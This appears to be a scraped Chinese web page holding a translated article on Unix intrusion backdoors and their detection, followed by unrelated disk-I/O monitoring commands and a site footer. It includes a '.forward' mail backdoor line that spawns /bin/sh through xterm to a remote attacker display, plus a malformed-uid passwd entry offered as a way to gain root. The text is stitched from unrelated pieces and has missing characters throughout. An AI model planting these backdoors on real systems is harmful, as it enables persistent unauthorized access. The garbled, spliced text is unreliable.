入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问 管理员可以用stat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉 通常这些后门可以让入侵者躲过TCP Wrapper技术 这些后门可以放在SMTP端口, 许多防火墙允许e-mail通行的
UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以stat不能显示入侵者的访问痕迹 许多防火墙设置成允许类似DNS的UDP报文的通行 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙
ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一 许多防火墙允许外界ping它内部的机器 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露
加密连接
管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了
Windows NT
由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击 因此你将更频繁地看到广泛的来自Unix的网络攻击 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来 今天, Windows NT已经有了tel守护程序 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的 ( With Neork Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT 此处该如何翻译 :(
解决
当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀
评估
首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之许多商业工具用来帮助扫描和查核网络及系统的漏洞 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性
MD5基准线
一个系统(安全)扫描的一个重要因素是MD5校验和基准线 MD5基准线是在黑客入侵前由干净系统建立 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了一些公司被入侵且系统被安置后门长达几个月所有的系统备份多包含了后门 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门 应该在入侵发生前作好基准线的建立
入侵检测
随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要以前多数入侵检测技术是基于日志型的 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话
从CD-ROM启动
一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性这种方法的问题是实现的费用和时间够企业面临的
警告
由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的请记住没有简单的防御,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention 此句该如何翻译 :( )
-------------------------------------------------------------------------
you may want to add:
forward Backdoor
On Unix machines, placing mands into the forward file was also
a mon method of regaining access For the account ``username''
a forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksysotherdom:00 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most monly located at /etc/aliases) Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary mands via
stdin (after minor preprocessing)
PS: The above method is also useful gaining access a panies
mailhub (assuming there is a shared a home directory FS on
&nbs>
the client and server)
> Using rsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves)
你也许要增加:
forward后门
Unix下在forward文件里放入命令是重新获得访问的常用方法 帐户'username'的forward可能设置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksysotherdom:00 -e/bin/sh"
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases) 注意这只是一种简单的变换 更为高级的能够从forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后)>利用 rsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail>类程序, 很有可能还有问题 )
( 此段的内容理解不深, 故付上英文, 请指教! )
---------------------------------------------------------------------------
你也许能用这个"特性"做后门:
当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查出这个错误的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利
例子:
rmartin:x:x50:50:R Martin:/home/rmartin:/bin/tcsh
1使用iotop命令
使用该命令有个条件,Linux内核要高于2620的版本,版本过低则没有此命令,执行效果如下图所示:
2:block_dump方法
首先,关闭syslog服务,然后开启block_dump,最后正则表达式提取dmesg信息。
/etc/initd/syslog stop
echo 1 > /proc/sys/vm/block_dump
dmesg | egrep "READ|WRITE|dirtied" | egrep -o '([a-zA-Z])' | sort | uniq -c | sort -rn | head
执行结果如下图所示:
注意: *** 作完成后请关闭block_dump和启动syslog
echo 0 > /proc/sys/vm/block_dump #关闭block_dump
/etc/initd/syslog start #启动syslog
以上就是关于后门天窗前门是什么梗全部的内容,包括:后门天窗前门是什么梗、libimobiledevice的简介和使用、如何抓取蓝牙ATC日志等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)